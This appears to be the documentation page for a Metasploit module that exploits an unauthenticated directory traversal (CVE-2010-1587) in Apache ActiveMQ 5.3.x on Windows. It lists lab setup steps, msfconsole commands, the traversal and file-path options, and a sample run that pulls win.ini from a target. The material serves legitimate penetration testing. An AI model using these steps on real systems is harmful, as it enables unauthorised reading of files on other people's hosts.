This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on Windows systems. The flaw exists in the Jetty ResourceHandler that ships with these versions, allowing an unauthenticated attacker to read arbitrary files from the target host.
The vulnerability is tracked as CVE-2010-1587.
To test this module you need a Windows host running one of the affected versions:
- Download Apache ActiveMQ 5.3.1 or 5.3.2.
- Extract the archive and run
bin\activemq.batto start the broker. - The web console listens on port 8161 by default.
- Start msfconsole
- Do:
use auxiliary/scanner/http/apache_activemq_traversal - Do:
set RHOSTS [target IP] - Do:
set RPORT 8161 - Do:
run - You should see the contents of the requested file saved as loot.
The path of the file to retrieve from the target system, relative to the drive root. The default
value is /windows\\win.ini. Backslashes must be used for path separators on Windows targets.
The number of traversal sequences (/\..) to prepend to the request. The default is 4. If the
file is not found, try increasing this value.
msf > use auxiliary/scanner/http/apache_activemq_traversal
msf auxiliary(scanner/http/apache_activemq_traversal) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(scanner/http/apache_activemq_traversal) > set RPORT 8161
RPORT => 8161
msf auxiliary(scanner/http/apache_activemq_traversal) > run
[*] 192.168.1.100:8161 - Sending request...
[*] 192.168.1.100:8161 - File saved in: /root/.msf4/loot/20250319120000_default_192.168.1.100_apache.activemq_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed